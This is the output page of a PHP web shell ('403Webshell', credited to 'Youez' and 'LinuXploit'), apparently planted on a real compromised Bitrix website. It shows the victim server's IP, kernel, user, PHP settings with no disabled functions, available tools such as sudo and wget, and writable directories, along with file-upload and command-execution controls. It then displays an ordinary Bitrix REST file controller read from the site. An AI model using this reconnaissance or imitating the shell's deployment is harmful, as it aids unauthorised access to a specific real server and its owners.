403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/rest/lib/controller/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/rest/lib/controller/file.php
<?php

namespace Bitrix\Rest\Controller;

use Bitrix\Main\Engine;
use Bitrix\Main\Engine\ActionFilter;
use Bitrix\Main\Localization\Loc;
use Bitrix\Main\Engine\Response\BFile;
use Bitrix\Main\Engine\Response\AjaxJson;
use Bitrix\Rest\RestException;
use Bitrix\Main\ErrorCollection;
use Bitrix\Main\Error;


Loc::loadMessages(__FILE__);

class File extends Engine\Controller
{
	private $allowEntityList = [
		'USER'
	];

	private $entityScope = [
		'USER' => 'user'
	];

	public function getAction($entity, $id, $field, $value, \CRestServer $restServer = null)
	{
		$errorCollection = new ErrorCollection();
		if (in_array($entity, $this->allowEntityList, true))
		{
			if ($restServer && $this->entityScope[$entity])
			{
				$authScope = $restServer->getAuthScope();
				if (!in_array($this->entityScope[$entity], $authScope, true))
				{
					$errorCollection->add(
						[
							new Error('Invalid request credentials', 'INVALID_CREDENTIALS')
						]
					);
				}
			}

			if ($errorCollection->isEmpty())
			{
				global $USER_FIELD_MANAGER;
				$userFieldsData = $USER_FIELD_MANAGER->getUserFields($entity, (int) $id, LANGUAGE_ID);

				if (
					$userFieldsData[$field]['USER_TYPE_ID'] === 'file'
					&& (int) $value > 0
					&& !empty($userFieldsData[$field]['VALUE']))
				{
					if (
						(int) $value === (int) $userFieldsData[$field]['VALUE']
						|| (
							is_array($userFieldsData[$field]['VALUE'])
							&& in_array((int) $value, $userFieldsData[$field]['VALUE'], true)
						)

					)
					{
						return BFile::createByFileId((int) $value);
					}

					$errorCollection->add(
						[
							new Error('File not found.', 'FILE_NOT_FOUND')
						]
					);
				}
				else
				{
					$errorCollection->add(
						[
							new Error('Entity not allow.', 'ENTITY_NOT_ALLOW')
						]
					);
				}
			}
		}
		else
		{
			$errorCollection->add(
				[
					new Error('Access denied.', 'ACCESS_DENIED')
				]
			);
		}

		if (!$errorCollection->isEmpty() && Engine\Controller::getScope() === Engine\Controller::SCOPE_REST)
		{
			/** @var  Error $error*/
			$error = $errorCollection->current();
			if ($error)
			{
				return new RestException(
					$error->getMessage(),
					$error->getCode()
				);

			}
		}

		return AjaxJson::createError($errorCollection);
	}

	public function getDefaultPreFilters()
	{
		return [
			new ActionFilter\Authentication()
		];
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit